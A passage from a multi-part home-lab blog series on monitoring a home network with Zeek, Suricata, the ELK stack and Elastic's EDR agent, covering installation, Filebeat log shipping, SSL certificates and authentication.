    - name: "zeek"
      ip:
        - "192.168.1.234"

Next, we’re going to use Elastic’s certutil tool to generate certificates for our instances. This will also generate a Certificate Authority as well.

/usr/share/elasticsearch/bin/elasticsearch-certutil cert ca --pem --in instances.yml --out certs.zip

This will create a .crt and .key file for each of our instances, and also a ca.crt file as well.

You can unzip the different certificates with unzip.

unzip /usr/share/elasticsearch/certs.zip -d /usr/share/elasticsearch/

Now we have our certificates, we can configure each instance.

Configuring Elasticsearch SSL

Firstly, we need to create a folder to store our certificates in on our Elasticsearch host.

mkdir /etc/elasticsearch/certs/ca -p

Next, we need to copy our unzipped certificates to their relevant folders and set the correct permissions.

cp ca/ca.crt /etc/elasticsearch/certs/ca
cp elasticsearch/elasticsearch.crt /etc/elasticsearch/certs
cp elasticsearch/elasticsearch.key /etc/elasticsearch/certs
chown -R elasticsearch: /etc/elasticsearch/certs
chmod -R 770 /etc/elasticsearch/certs

Next, we need to add our SSL configuration to our /etc/elasticsearch/elasticsearch.yml file.

# Transport layer
xpack.security.transport.ssl.enabled: true
xpack.security.transport.ssl.verification_mode: certificate
xpack.security.transport.ssl.key: /etc/elasticsearch/certs/elasticsearch.key
xpack.security.transport.ssl.certificate: /etc/elasticsearch/certs/elasticsearch.crt
xpack.security.transport.ssl.certificate_authorities: [ "/etc/elasticsearch/certs/ca/ca.crt" ]

# HTTP layer
xpack.security.http.ssl.enabled: true
xpack.security.http.ssl.verification_mode: certificate
xpack.security.http.ssl.key: /etc/elasticsearch/certs/elasticsearch.key
xpack.security.http.ssl.certificate: /etc/elasticsearch/certs/elasticsearch.crt
xpack.security.http.ssl.certificate_authorities: [ "/etc/elasticsearch/certs/ca/ca.crt" ]

Now restart Elasticsearch.

service elasticsearch restart 

Configuring Kibana SSL

Now we’re going to repeat the process but this time for Kibana. The configuration is slightly different for Kibana.

Again, move your certificates to the correct folder and set the correct permissions.

Note: The following steps are assuming you are running a standalone ELK configuration. If you are running a distributed deployment, you’ll need to move certificates to the appropriate hosts.

mkdir /etc/kibana/certs/ca -p
cp ca/ca.crt /etc/kibana/certs/ca
cp kibana/kibana.crt /etc/kibana/certs
cp kibana/kibana.key /etc/kibana/certs
chown -R kibana: /etc/kibana/certs
chmod -R 770 /etc/kibana/certs

Next, in your file /etc/kibana/kibana.yml add the settings for SSL between Elasticsearch and Kibana.

# The URLs of the Elasticsearch instances to use for all your queries.
elasticsearch.hosts: ["https://192.168.1.232:9200"]
elasticsearch.ssl.certificateAuthorities: ["/etc/kibana/certs/ca/ca.crt"]
elasticsearch.ssl.certificate: "/etc/kibana/certs/kibana.crt"
elasticsearch.ssl.key: "/etc/kibana/certs/kibana.key"

And then in the same file, add the configuration between Kibana and your browser.

# These settings enable SSL for outgoing requests from the Kibana server to the browser.
server.ssl.enabled: true
server.ssl.certificate: "/etc/kibana/certs/kibana.crt"
server.ssl.key: "/etc/kibana/certs/kibana.key"

Then, restart Kibana.

service kibana restart

Configuring Beats (Zeek) SSL

For the next step, we need to configure SSL for our host running Zeek and Beats. If you’re not running Zeek or any other product that uses a Filebeats module like Suricata, Windows Event Log, etc.. then you can skip this step.

First copy your certificates over to your host running Zeek, then create the cert directories with the correct permissions. You’ll need to copy both the Zeek certificates and the CA certificate.

mkdir /etc/filebeat/certs/ca -p
cp ca/ca.crt /etc/filebeat/certs/ca
cp zeek/zeek.crt /etc/filebeat/certs
cp zeek/zeek.key /etc/filebeat/certs
chmod 770 -R /etc/filebeat/certs

Next, we need to add our changes to the /etc/filebeat/filebeat.yml

First our Elasticsearch config settings.

# Elastic Output
output.elasticsearch.hosts: ['192.168.1.232:9200']
output.elasticsearch.protocol: https
output.elasticsearch.ssl.certificate: "/etc/filebeat/certs/zeek.crt"
output.elasticsearch.ssl.key: "/etc/filebeat/certs/zeek.key"
output.elasticsearch.ssl.certificate_authorities: ["/etc/filebeat/certs/ca/ca.crt"]

And then our Kibana config settings.

# Kibana Host
host: "https://192.168.1.232:5601"
  ssl.enabled: true
  ssl.certificate_authorities: ["/etc/filebeat/certs/ca/ca.crt"]
  ssl.certificate: "/etc/filebeat/certs/zeek.crt"
  ssl.key: "/etc/filebeat/certs/zeek.key"

Then restart Filebeat.

service filebeat restart

Now you can check that Filebeat is able to contact Elastic by running the command below. Everything should return “ok”.

filebeat test output

Adding Authentication

We also need to add authentication to Elastic. This is pretty easy to do. First, enable X-Pack by editing your /etc/elasticsearch/elasticsearch.yml

# X-Pack Setting
xpack.security.enabled: true

Next, we need to generate passwords for all of our built-in Elastic roles and users. There’s a tool included with Elasticsearch to do this. Run the command below to generate these passwords and save them somewhere safe (password manager). We’ll be using the Elastic password for the next part.

/usr/share/elasticsearch/bin/elasticsearch-setup-passwords auto

Next, add the newly created Elastic credential to your Filebeat config file, /etc/filebeat/filebeat.yml

# Elastic Credentials
output.elasticsearch.username: "elastic"
output.elasticsearch.password: "Your_Elastic_Pass_Here"

Restart Filebeat.

service filebeat restart

Next, do the same for your Kibana config file, /etc/kibana/kibana.yml. Also, enable X-Pack here as well.

# Elastic Credentials
xpack.security.enabled: true
elasticsearch.username: "elastic"
elasticsearch.password: "Your_Elastic_Pass_Here"

Restart Kibana.

service kibana restart

You should now see a login box when you navigate to your Kibana IP address.

Kibana SSL

Adding data to Elasticsearch

So we now have everything set up, the next thing we need to do is start ingesting data into Elasticsearch. In my case, I’m going to be using Zeek to tap my network traffic. I’ve already covered how to do this in my previous two blogs so I’m not going to cover it again here.

To see how to install Zeek, read part 1 here.

And to see how to configure the Filebeat Zeek module, read from “Configuring Zeek” in my part 2 blog here.

Enabling Detections

Once you have completed all the above steps and have data ingesting into Elastic, you will probably notice that you are still unable to create detections. There is one final step to complete. Edit your Kibana config file, /etc/kibana/kibana.yml, and add an xpack.encryptedSavedObjects.encryptionKey. This can be any 32-character string.

# X-Pack Key 
xpack.encryptedSavedObjects.encryptionKey: "something_at_least_32_characters"

You should now be able to view the built-in detection rules and create your own. We’ll look at how to create rules in another future post.

Elastic SIEM detections

Installing Elastic EDR Agent

Now we’re ready to install the Elastic EDR agent. First, navigate to the “Fleet” dashboard by clicking on the link under the Management tab located on the side menu.

Elastic EDR install

From the fleet management menu, click “add agent”. It’s likely that you’ll be asked to add an integration policy before you can install agents; just follow the wizard and keep the defaults.

Elastic EDR install

We’re going to use the “Enroll in Fleet” option to install the EDR.

First, download the Elastic Agent onto your Windows/Linux Host.

Once you have the agent downloaded, keep the default policy selected under the Agent policy.

Before moving onto Step 3 we have another step to complete first.

Elastic EDR install

If we were to install the agent onto our Windows host now, we would receive an error that our self-signed certificate is from an untrusted source, and our agent install would fail.

So what we need to do is to add our CA certificate as a trusted certificate on our Windows host.

Install Certificates

First search for “Local Security Policy” in your Windows search bar. Then go to Security Settings > Public Key Policies > Certificate Path Validation Settings

Then check Define these policy settings, and also check the Allow user trusted root CAs to be used to validate certificates and Allow users to trust peer trust certificates options if they’re not already selected.

Finally check Third-Party Root CAs and Enterprise Root CAs.

Click apply and ok.

Elastic EDR install

Next search for certmgr.msc in the Windows Search Bar.

Then go to Trusted Root Certification Authorities > Certificates and right-click anywhere in the whitespace and select All Tasks > Import

Then simply follow the wizard and select the ca.crt we created earlier.

Elastic EDR install

Install the Agent

Now we’re ready to install the Elastic Agent. Copy the install command from the Fleet Dashboard and run it with PowerShell on your Windows host where the agent is located.

Elastic EDR config

If all has gone right, you should see the agent has been successfully enrolled via the fleet dashboard.

Elastic EDR SIEM

We’re not done yet, however; we need to check that data is being ingested correctly into Elasticsearch from our agent. You can do this by navigating to the Data Streams tab, which you should see populated with endpoint data. If there is no data here, check your fleet settings by clicking the settings cog in the top-right corner, and ensure that your Elasticsearch settings are set to the correct IP and not to localhost.

Elastic EDR config

Finally, we need to enable detection rules for our EndPoint agent. Go to the detections dashboard in the Kibana Security app, and “enable” any endpoint rules you want.

Elastic EDR SIEM

Now you can test that it works, perform some badness on your Windows host and see what happens! In my case, Elastic EDR successfully detected and prevented both the Mimikatz files and also the process execution of Mimikatz.

Elastic EDR Mimikatz Block

We can also see this in our Kibana Security Detections Dashboard.

And we can also dive a little deeper with a nice little process tree graphic and an overview of the event. Very cool!

Elastic EDR Process Tree Mimikatz

Conclusion

And so that brings this post to an end; I hope you’ve found it useful. So far, with the limited testing I have done, I have found Elastic’s EDR to be impressive. It has the look and feel of an enterprise-grade tool, which, considering it’s free and open source, is amazing. I plan to do some more thorough testing in the future to see how it performs, but as it stands it certainly seems to be the leading EDR in the open-source world. It would be my go-to recommendation for small to medium businesses who may not have the budget for other expensive tools. The question is, can it give the big paid tools a run for their money?

Resources

https://www.elastic.co/guide/index.html

https://www.elastic.co/endpoint-security/

https://docs.zeek.org/en/current/

Home Monitoring: Sending Zeek logs to ELK

Prerequisites

This post marks the second instalment of the “Create enterprise monitoring at home” series, here is part one in case you missed it. In this post, we’ll be looking at how to send Zeek logs to ELK Stack using Filebeat. A few things to note before we get started,

  • I’m running ELK in its own VM, separate from my Zeek VM, but you can run it on the same VM if you want.
    • ELK is running on a Ubuntu 18.04 VM.
  • It’s pretty easy to break your ELK stack, as it’s quite sensitive to even small changes; I’d recommend taking regular snapshots of your VMs as you progress.

Installing Elastic

Installing Elastic is fairly straightforward. First, add the PGP key used to sign the Elastic packages.

wget -qO - https://artifacts.elastic.co/GPG-KEY-elasticsearch | sudo apt-key add -

If you need to, add the apt-transport-https package.

sudo apt-get install apt-transport-https

Then add the elastic repository to your source list.

echo "deb https://artifacts.elastic.co/packages/7.x/apt stable main" | sudo tee -a /etc/apt/sources.list.d/elastic-7.x.list

Finally install the ElasticSearch package.

sudo apt-get update && sudo apt-get install elasticsearch

Once installed, we need to make one small change to the Elasticsearch config file, /etc/elasticsearch/elasticsearch.yml. We’re going to set the bind address to 0.0.0.0, which will allow us to connect to Elasticsearch from any host on our network. It’s worth noting that binding to 0.0.0.0 isn’t best practice, and you wouldn’t do this in a production environment, but as we are just running this on our home network it’s fine.
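For reference, the changed line in /etc/elasticsearch/elasticsearch.yml looks like this (note that on some single-node 7.x installs you may also need a discovery setting, such as discovery.type: single-node, once the bind address is changed):

network.host: 0.0.0.0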

Once that’s done, let’s start the ElasticSearch service, and check that it’s started up properly.

sudo service elasticsearch start
sudo service elasticsearch status 

You should get a green light and an active running status if all has gone well. Next, we want to make sure that we can access Elastic from another host on our network. I’m going to use my other Linux host running Zeek to test this. Run the curl command below from another host, and make sure to include the IP of your Elastic host.

curl -X GET "IP OF YOUR ELASTIC HOST:9200/?pretty" 

If all has gone right, you should get a response similar to the one below.

Installing Kibana

Now it’s time to install and configure Kibana; the process is very similar to installing Elasticsearch. We’ve already added the Elastic APT repository, so it should just be a case of installing the Kibana package.

sudo apt-get update && sudo apt-get install kibana

Once it’s installed, we want to make a change to the config file, similar to what we did with Elasticsearch. Change the server host to 0.0.0.0 in the /etc/kibana/kibana.yml file.
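In other words, in /etc/kibana/kibana.yml:

server.host: "0.0.0.0"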

Once it’s installed, start the service and check the status to make sure everything is working properly.

sudo service kibana start
sudo service kibana status 

You should get a green light and an active running status if all has gone well. Now let’s check that everything is working and we can access Kibana on our network. Browse to the IP address hosting kibana and make sure to specify port 5601, or whichever port you defined in the config file. You should see a page similar to the one below.

Configuring Zeek

Now that we’ve got ElasticSearch and Kibana set up, the next step is to get our Zeek data ingested into ElasticSearch. There are a couple of ways to do this. Kibana has a Filebeat module specifically for Zeek, so we’re going to utilise this module.

First, go to the SIEM app in Kibana, do this by clicking on the SIEM symbol on the Kibana toolbar, then click the “add data” button. As shown in the image below, the Kibana SIEM supports a range of log sources, click on the “Zeek logs” button.

You have to install Filebeat on the host you are shipping the logs from, so in our case we’re going to install Filebeat onto our Zeek server. Follow the instructions specified on the page to install Filebeat. Once installed, edit the filebeat.yml configuration file and change the appropriate fields; the username and password for Elastic should be kept as the default unless you’ve changed them, and make sure to change the Kibana output fields as well.
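The relevant parts of /etc/filebeat/filebeat.yml end up looking something like the snippet below (the IPs and password are placeholders for your own Elasticsearch and Kibana hosts and credentials):

output.elasticsearch:
  hosts: ["<your_elasticsearch_ip>:9200"]
  username: "elastic"
  password: "<your_password>"

setup.kibana:
  host: "<your_kibana_ip>:5601"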

Once that is done, we need to configure Zeek to convert the Zeek logs into JSON format. First, stop Zeek from running.

zeekctl stop

Then add the line @load policy/tuning/json-logs.zeek to the file /opt/zeek/share/zeek/site/local.zeek

Restart zeek

zeekctl deploy

And now check that the logs are in JSON format. Even if you are not familiar with JSON, the format of the logs should look noticeably different than before.

tail -f /opt/zeek/logs/current/dns.log

Now we need to configure the Zeek Filebeat module. First, enable the module.

sudo filebeat modules enable zeek

Then edit the config file, /etc/filebeat/modules.d/zeek.yml. We need to specify each individual log file created by Zeek, or at least the ones that we wish for Elastic to ingest. For each log file in the /opt/zeek/logs/ folder, the path of the “current” log, and any previous log have to be defined, as shown below.

dns:
   enabled: true
   var.paths: [ "/opt/zeek/logs/current/dns.log", "/opt/zeek/logs/*.dns.json" ]

If there are some default log files in the /opt/zeek/logs folder, like capture_loss.log, that you do not wish to be ingested by Elastic, then simply set the “enabled” field to false. It’s important to set any log sources which do not have a log file in /opt/zeek/logs to enabled: false, otherwise you’ll receive an error. Also be careful with spacing, as YAML files are space-sensitive.

Once that’s done, you should be pretty much good to go: run the Filebeat setup and start the service.

sudo filebeat setup
sudo service filebeat start

If everything has gone right, you should get a successful message once the setup command has completed.

If you go to the network dashboard within the SIEM app, you should see the different dashboards populated with data from Zeek! The dashboards here give a nice overview of some of the data collected from our network. We’ll learn how to build some more protocol-specific dashboards in the next post in this series.

Enriching with Suricata

This next step is an additional extra; it’s not required, as we already have Zeek up and working. However, adding an IDS like Suricata can give some additional information on the network connections we see, and can identify malicious activity. Some people may think adding Suricata to our SIEM is a little redundant, as we already have an IDS in place with Zeek, but this isn’t really true. While Zeek is often described as an IDS, it’s not really one in the traditional sense: Zeek collects metadata for connections it sees on the network, and while there are scripts and additional packages that can be used with Zeek to detect malicious activity, it does not necessarily do this on its own. Suricata is more of a traditional IDS and relies on signatures to detect malicious activity. I often question the reliability of signature-based detections, as they tend to be very false-positive heavy, but they can still add some value, particularly if well tuned.

Installing Suricata

I’m not going to detail every step of installing and configuring Suricata, as there are already many guides online which you can use. I used this guide as it shows you how to get Suricata set up quickly. I’m going to install Suricata on the same host that is running Zeek, but you can set up a new dedicated VM for Suricata if you wish. Just make sure you assign your mirrored network interface to the VM, as this is the interface Suricata will run against.

Once you have Suricata set up, it’s time to configure Filebeat to send its logs into Elasticsearch; this is pretty simple to do. Navigate to the SIEM app in Kibana, click on the “add data” button, and select Suricata Logs.

Follow the instructions; they’re all fairly straightforward and similar to when we imported the Zeek logs earlier. Step 3 is the only step that’s not entirely clear: for this step, edit /etc/filebeat/modules.d/suricata.yml and specify the path of your suricata.json file.

var.paths: ["/my/path/suricata.json"]

Once that’s done, complete the setup with the following commands.

./filebeat setup
./filebeat -e

If all has gone right, you should receive a success message when checking if data has been ingested.

We can also confirm this by checking the networks dashboard in the SIEM app, here we can see a break down of events from Filebeat.

Conclusion

And that brings this post to an end! It’s fairly simple to add other log sources to Kibana via the SIEM app now that you know how. I’d recommend adding some endpoint-focused logs; Winlogbeat is a good choice.

I’d say the most difficult part of this post was working out how to get the Zeek logs into ElasticSearch in the correct format with Filebeat. It’s not very well documented. In the next post in this series, we’ll look at how to create some Kibana dashboards with the data we’ve ingested.

Create enterprise monitoring at home with Zeek and Elk (Part 1)

Intro

In this series, I’m going to show you how you can utilise open source technology to build your own network monitoring solution good enough to be deployed in any enterprise environment! The two core technologies that we’re going to use are Zeek (formerly Bro) and ELK.

For those unaware, Zeek is an open-source network monitoring framework which creates alerts and events based on data collected from a network tap. One way I describe Zeek to people is that it’s essentially an IDS on steroids. It’s used throughout the industry, especially in the network anomaly space; in fact, the UK cybersecurity company Darktrace uses Zeek as a key component of their product.

The plan for this solution is to tap our home network with Zeek and feed the logs into ELK. With ELK we can run queries across our data, build out some beautiful dashboards with Kibana, and even create some analytics to automate detections. We will also look at deploying an endpoint agent on some devices and feeding those logs into ELK too.

Prerequisites

In order to follow along, you’ll need

  • A server/old PC capable of running Zeek and ELK
    • In my case, I have an HP ProLiant ML350e running ESXi
    • The server needs to have a minimum of 2 free network ports
    • For it to run smoothly, at least 8GB of memory and a decent processor.
  • A managed network switch which is capable of port mirroring.

Network Architecture

The diagram below shows a rough guide to my home network. The key points to take from this diagram are the mirror tap on the network and the mirror connection. To get the most out of Zeek, you need to tap the connection on your switch that goes to your router, essentially the connection from your LAN to the internet. By doing this we will capture all traffic from our home networking going out to the internet, from devices like iPhones connected to the Wi-Fi and the PiHole acting as our DNS server.

VMware Setup

You should first check that your physical NICs on your server are visible in ESXi. Go to Networking > Physical NICs in ESXi and you should see them there.

Both of these physical connections should connect into your switch, with one going into your mirror port, and the other a regular switch port. You can set your mirror port in your switch config. I have a Netgear GS110TP where port 2 is the one that goes into my router, and I have port 6 free, so that is the one I’ll configure to be the mirror port.

You’ll need to know which ports on your server correspond to which ESXi physical ports. For example, port 6 on my switch plugs into Eth1 on my server, and Eth1 is called vmnic1 in ESXi. So vmnic1 will be the mirror NIC.

Next, we need to create a virtual switch that will be used for the mirror data. Go to Networking > Virtual Switches > Add Standard Virtual Switch, and enter the details shown below, selecting your mirror NIC as “Uplink 1”. Make sure that you set promiscuous mode to “Accept”.

Now add a port group by going to Networking > Port Groups > Add port group, and assign the virtual switch you just created to it. Again, make sure promiscuous mode is enabled.

Now you’re ready to create your virtual machine; I’m using Ubuntu Server 18.04 for mine. When creating your VM, make sure you add both network adapters, including the one you’re using for the mirrored traffic.

Preparing for Zeek

Once you’ve got Ubuntu installed, do the usual updates.

sudo apt-get update
sudo apt-get upgrade

Now check that both of your network interfaces are detected by Ubuntu. It is highly likely that your Mirror port will be down. As you can see from the image below, both of my interfaces are detected but only the management interface (ens160) is up with an IP address assigned.

To fix this, let’s first put the interface into promiscuous mode, and then bring it “up”.

ip link set "your mirror int" promisc on
ip link set "your mirror int" up

Let’s now check that we’re receiving traffic on the mirror port by running tcpdump.

tcpdump -i "your mirror int" 

If everything has worked, you should see the mirrored traffic flowing through the interface similar to the image below.

Installing Zeek

We’re now ready to crack on and install Zeek. To start, we need to install all the prerequisites. Do so by running the command below.

sudo apt-get install cmake make gcc g++ flex bison libpcap-dev libssl-dev python-dev swig zlib1g-dev

Next, we need to create the working directory for Zeek; for some reason, Zeek does not do this by default on install.

sudo mkdir /opt/zeek
sudo chown -R zeek:zeek /opt/zeek
sudo chmod 740 /opt/zeek

Next, download Zeek with Git:

git clone --recursive https://github.com/zeek/zeek

Enter the Zeek directory you just cloned, then set the /opt/zeek directory we created earlier as the install prefix.

cd /home/paul/zeek
./configure --prefix=/opt/zeek

Now we’re ready to build and install Zeek. Run the following make commands and leave it to install (this can take some time).

make
make install 

Next, we need to add the Zeek binaries to the PATH environment variable.

export PATH=/opt/zeek/bin:$PATH

And now we need to add some basic config to the node.cfg file, which is located in the /opt/zeek/etc/ directory. Uncomment the manager, proxy and worker-1 settings, and define your mirror interface in the worker-1 settings; an example is shown below.
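After uncommenting, the cluster section of node.cfg looks something like this (the interface name is a placeholder for your mirror NIC):

[manager]
type=manager
host=localhost

[proxy-1]
type=proxy
host=localhost

[worker-1]
type=worker
host=localhost
interface=ens192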

Now we’re ready to deploy Zeek by running the command below

zeekctl deploy

If all goes well we should not get any errors, and we can check to make sure everything started up properly by checking the status of zeek.

zeekctl status

Everything looks good! So now let’s go and check the logs where our captured data is being written. Logs are located in the /opt/zeek/logs/ directory.
The “current” directory holds the logs for the current day, while logs from previous days are archived off into their own directories. There’s also a different log file for each data type, like DNS connections, HTTP connections, etc…

Let’s check the DNS logs:

tail -f dns.log

Awesome! So everything is working correctly!

That concludes this post. Keep an eye out for part 2 of this series, where we’re going to deploy ELK and feed our logs into Elasticsearch so we can build some beautiful dashboards to display our captured data.
